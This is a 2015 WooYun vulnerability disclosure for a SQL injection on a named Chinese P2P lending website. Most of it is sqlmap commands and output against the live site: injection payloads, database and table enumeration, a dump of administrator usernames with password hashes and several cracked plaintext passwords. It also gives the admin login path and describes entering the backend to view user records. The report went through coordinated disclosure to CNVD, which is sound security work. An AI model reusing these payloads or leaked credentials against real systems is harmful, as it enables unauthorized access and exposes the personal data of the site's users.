当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131431

漏洞标题:某P2P网站存在SQL盲注(已入后台,2000多名用户信息泄露)

相关厂商:四川华澳融信投资管理有限公司

漏洞作者: 帅克笛枫

提交时间:2015-08-05 16:49

修复时间:2015-09-21 15:26

公开时间:2015-09-21 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

~人生难得起起落落~还是要坚强的生活~朋友的情谊,比天还高,比地还辽阔~那些岁月我们一定会记得~朋友的情谊呀,我们今生最大的难得~

详细说明:

四川华澳融信投资管理有限公司站点http://www.huaop2p.com/content.aspx?id=533249066410,如图所示:

ha1.png

将链接放入sqlmap检测,如图所示:

ha2.png

ha3.png

系统中的所有数据库,如下所示:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410"
--dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
available databases [80]:
[*] a0113182216
[*] a0128011355
[*] a0130145917
[*] a0201104743
[*] a0208164407
[*] a0210153415
[*] a0228084431
[*] a0311102642
[*] a0330140301
[*] a0418174447
[*] a0419110926
[*] a0427235123
[*] a0501153320
[*] a0520203405
[*] a0527185201
[*] a0602231518
[*] a0604195047
[*] a0608102832
[*] a0610012306
[*] a0615122150
[*] a0616084743
[*] a0620155344
[*] a06301737001093710
[*] a0701225317
[*] a0702205607
[*] a0703081717
[*] a0707010235
[*] a0710002920
[*] a0714091756
[*] a0722080206
[*] a0728213444
[*] a0730153611
[*] a09031058139
[*] a09031154589
[*] a0903191547
[*] a0906182409
[*] a0916114309
[*] a1013000956
[*] a101510471810052
[*] a1020232323
[*] a1024124641
[*] a1024141701
[*] a1027194218549210
[*] a1027194510767010
[*] a102719491898383
[*] a102720205710379
[*] a102720320621600
[*] a1027203402321037
[*] a10282223425
[*] a1101205421
[*] a1102234009
[*] a111020573387044
[*] a111020581665710
[*] a111110315410716
[*] a1112182355
[*] a1114140610434810
[*] a1121082245
[*] a1124195710
[*] a1206212205
[*] a1209231849
[*] a1210001138
[*] a1212153729
[*] fayapower
[*] fayapxbbs
[*] gxlqjyzx
[*] gzhyseo
[*] huao
[*] jtylqx
[*] lingui88
[*] marutomo
[*] master
[*] model
[*] msdb
[*] nanchunhui01
[*] pxpstcom
[*] sqnbxinyi
[*] tempdb
[*] tiantang9988
[*] zghmj
[*] zouchangfu
[21:20:19] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\www.huaop2p.com'


查看当前数据库和用户,如下所示:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410"
--current-user --current-db
[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410"
-D huao --tables
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=533249066410' AND 2200=2200 AND 'zgDf'='zgDf
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=533249066410' AND 7847=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(118)
+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (7847=7847) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(58)+CHAR(103)+CHAR(115)+CHAR(112)+CHAR(58))) AND 'Tmkk'='Tmkk
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=533249066410' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(118)+CHAR
(114)+CHAR(58)+CHAR(115)+CHAR(73)+CHAR(108)+CHAR(81)+CHAR(100)+CHAR(87)+CHAR(113
)+CHAR(105)+CHAR(111)+CHAR(106)+CHAR(58)+CHAR(103)+CHAR(115)+CHAR(112)+CHAR(58)-
-
---
[21:21:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[21:21:35] [INFO] fetching current user
current user:    'huao'
[21:21:35] [INFO] fetching current database
current database:    'huao'
[21:21:35] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\www.huaop2p.com'
[*] shutting down at 21:21:35

漏洞证明:

获取当前库中的所有表,如下所示:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410"
-D huao --tables
Database: huao
[105 tables]
+---------------------------------------+
| dbo.Web_Info_Data                     |
| dbo.Web_Info_Type                     |
| dbo.fs_Attachments                    |
| dbo.fs_Collect_News                   |
| dbo.fs_Collect_Rule                   |
| dbo.fs_Collect_RuleApply              |
| dbo.fs_Collect_Site                   |
| dbo.fs_Collect_SiteFolder             |
| dbo.fs_News_URL                       |
| dbo.fs_User_URL                       |
| dbo.fs_User_URLClass                  |
| dbo.fs_ads                            |
| dbo.fs_ads_class                      |
| dbo.fs_ads_stat                       |
| dbo.fs_adstxt                         |
| dbo.fs_api_commentary                 |
| dbo.fs_api_faviate                    |
| dbo.fs_api_navi                       |
| dbo.fs_classdroptemplet               |
| dbo.fs_customform                     |
| dbo.fs_customform_item                |
| dbo.fs_define_class                   |
| dbo.fs_define_data                    |
| dbo.fs_define_save                    |
| dbo.fs_friend_class                   |
| dbo.fs_friend_link                    |
| dbo.fs_friend_pram                    |
| dbo.fs_news                           |
| dbo.fs_news_Class                     |
| dbo.fs_news_Gen                       |
| dbo.fs_news_JS                        |
| dbo.fs_news_JSFile                    |
| dbo.fs_news_JST_Class                 |
| dbo.fs_news_JSTemplet                 |
| dbo.fs_news_area                      |
| dbo.fs_news_jobclass                  |
| dbo.fs_news_page                      |
| dbo.fs_news_site                      |
| dbo.fs_news_special                   |
| dbo.fs_news_sub                       |
| dbo.fs_news_topline                   |
| dbo.fs_news_unNews                    |
| dbo.fs_news_vote                      |
| dbo.fs_newsdroptemplet                |
| dbo.fs_old_news                       |
| dbo.fs_special_news                   |
| dbo.fs_specialdroptemplet             |
| dbo.fs_stat_Info                      |
| dbo.fs_stat_class                     |
| dbo.fs_stat_content                   |
| dbo.fs_stat_param                     |
| dbo.fs_sys_City                       |
| dbo.fs_sys_Help                       |
| dbo.fs_sys_Label                      |
| dbo.fs_sys_LabelClass                 |
| dbo.fs_sys_LabelFree                  |
| dbo.fs_sys_LabelStyle                 |
| dbo.fs_sys_PramUser                   |
| dbo.fs_sys_Pramother                  |
| dbo.fs_sys_User                       |
| dbo.fs_sys_UserLevel                  |
| dbo.fs_sys_admin                      |
| dbo.fs_sys_admingroup                 |
| dbo.fs_sys_logs                       |
| dbo.fs_sys_newsIndex                  |
| dbo.fs_sys_param                      |
| dbo.fs_sys_parmConstr                 |
| dbo.fs_sys_parmPrint                  |
| dbo.fs_sys_styleclass                 |
| dbo.fs_sys_userfields                 |
| dbo.fs_sys_userother                  |
| dbo.fs_user_Card                      |
| dbo.fs_user_Constr                    |
| dbo.fs_user_ConstrClass               |
| dbo.fs_user_Discuss                   |
| dbo.fs_user_DiscussActive             |
| dbo.fs_user_DiscussActiveMember       |
| dbo.fs_user_DiscussClass              |
| dbo.fs_user_DiscussContribute         |
| dbo.fs_user_DiscussMember             |
| dbo.fs_user_DiscussTopic              |
| dbo.fs_user_Friend                    |
| dbo.fs_user_FriendClass               |
| dbo.fs_user_Ghistory                  |
| dbo.fs_user_Group                     |
| dbo.fs_user_Guest                     |
| dbo.fs_user_Guser                     |
| dbo.fs_user_MessFiles                 |
| dbo.fs_user_Message                   |
| dbo.fs_user_Photo                     |
| dbo.fs_user_Photoalbum                |
| dbo.fs_user_PhotoalbumClass           |
| dbo.fs_user_Requestinformation        |
| dbo.fs_user_constrPay                 |
| dbo.fs_user_news                      |
| dbo.fs_user_note                      |
| dbo.fs_user_userlogs                  |
| dbo.fs_user_vote                      |
| dbo.fs_vote_Item                      |
| dbo.fs_vote_Steps                     |
| dbo.fs_vote_class                     |
| dbo.fs_vote_manage                    |
| dbo.fs_vote_param                     |
| dbo.fs_vote_title                     |
| dbo.station_userbaseinfo_province_tab |
+---------------------------------------+


查看当前表的数据,如下所示:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410"
-D huao -T dbo.fs_sys_User --columns
Database: huao
Table: dbo.fs_sys_User
[45 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| Addfriend       | int      |
| Addfriendbs     | tinyint  |
| aPoint          | int      |
| BindTF          | tinyint  |
| birthday        | datetime |
| CertNumber      | nvarchar |
| CertType        | nvarchar |
| cPoint          | int      |
| EmailATF        | tinyint  |
| EmailCode       | nvarchar |
| ePoint          | int      |
| FriendClass     | nvarchar |
| gPoint          | int      |
| Id              | bigint   |
| IDcardFiles     | nvarchar |
| iPoint          | int      |
| isAdmin         | tinyint  |
| isIDcard        | tinyint  |
| isLock          | tinyint  |
| isMobile        | tinyint  |
| isOpen          | tinyint  |
| LastIP          | nvarchar |
| LastLoginTime   | datetime |
| LoginLimtNumber | int      |
| LoginNumber     | int      |
| marriage        | tinyint  |
| mobile          | nvarchar |
| MobileCode      | nvarchar |
| NickName        | nvarchar |
| OnlineTF        | int      |
| OnlineTime      | int      |
| ParmConstrNum   | int      |
| PassKey         | nvarchar |
| PassQuestion    | nvarchar |
| RealName        | nvarchar |
| RegTime         | datetime |
| Sex             | tinyint  |
| SiteID          | nvarchar |
| UserFace        | nvarchar |
| userFacesize    | nvarchar |
| UserGroupNumber | nvarchar |
| Userinfo        | ntext    |
| UserName        | nvarchar |
| UserNum         | nvarchar |
| UserPassword    | nvarchar |
+-----------------+----------+
[20:15:51] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\www.huaop2p.com'

获取当前管理员用户及账号和密码,如图所示:[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410"
-D huao -T dbo.fs_sys_User -C isAdmin,UserName,Userinfo,UserPassword --dump
Database: huao
Table: dbo.fs_sys_User
[6 entries]
+---------+------------+----------+------------------+
| isAdmin | UserName | Userinfo | UserPassword |
+---------+------------+----------+------------------+
| 1 | admin | <blank> | 91b974bd182997b3 |
| 0 | adminn | <blank> | 16a7c67e2727b471 |
| 1 | chenxinrui | <blank> | f1a0b468d16e3863 |
| 0 | dwqdwqd | <blank> | cbfb3919a2b2e8f8 |
| 1 | user | <blank> | ac59075b964b0715 |
| 1 | zhaopin | <blank> | 0abda1fe89448375 |
+---------+------------+----------+------------------+
f1a0b468d16e3863
查询结果:
Apr.24
0abda1fe89448375
查询结果:
huaop2p
cbfb3919a2b2e8f8
查询结果:
dwqdwqd
[20:29:13] [INFO] table 'huao.dbo.fs_sys_User' dumped to CSV file 'F:\wooyun\sql
map\Bin\output\www.huaop2p.com\dump\huao\fs_sys_User.csv'
[20:29:13] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\www.huaop2p.com'
[*] shutting down at 20:29:13
感谢大牛帮忙解密,本来是要测试是否存在XSS,结果发现是风讯2.0系统,如图所示:

ha7.png

ha8.png

默认后台管理地址,http://www.huaop2p.com/manage/Index.aspx,输入管理员用户密码,如图所示:

ha4.png

查看用户信息,如图所示:

ha5.png

ha6.png

修复方案:

过滤~优化查询~修复你们更专业

版权声明:转载请注明来源 帅克笛枫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-07 15:25

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无